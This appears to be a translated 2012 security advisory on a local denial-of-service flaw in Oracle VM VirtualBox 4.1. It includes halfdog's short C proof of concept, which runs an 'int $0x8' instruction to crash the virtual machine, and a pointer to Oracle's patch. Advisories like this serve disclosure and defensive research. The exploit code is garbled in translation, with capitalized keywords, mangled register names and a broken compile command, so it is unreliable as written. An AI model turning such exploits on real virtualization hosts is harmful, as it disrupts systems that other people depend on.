Oracle VM VirtualBox Local Denial of Service Vulnerability

Release date: 2012-09-08
Updated on:

Affected Systems:
Oracle VM VirtualBox 4.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55471

VirtualBox is a x86 virtualization product.

Oracle VM VirtualBox has a local denial of service vulnerability. Attackers can exploit this vulnerability to cause denial of service.

<* Source: halfdog
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

/** This software is provided by the copyright owner "as is" and any
* Expressed or implied warranties, including, but not limited,
* The implied warranties of merchantability and fitness for a participant
* Purpose are disclaimed. In no event shall the copyright owner be
* Liable for any direct, indirect, incidential, special, exemplary or
* Consequential damages, including, but not limited to, procurement
* Of substitute goods or services, loss of use, data or profits or
* Business interruption, however caused and on any theory of liability,
* Whether in contract, strict liability, or tort, including negligence
* Or otherwise, arising in any way out of the use of this software,
* Even if advised of the possibility of such damage.
*
* Copyright (c) 2012 halfdog <me (%) halfdog.net>
*
* Compile: gcc-o RtcInt. c
* Usage:./RtcInt
*/
Int main (int argc, char ** argv ){
Asm (
"Int $0x8 ;"
: // Output: none
: // Input: none
: "% Eax", "% ebx", "% ecx", "% edx" // clobbered register
);
Return (0 );
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Oracle
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.oracle.com/technetwork/topics/security/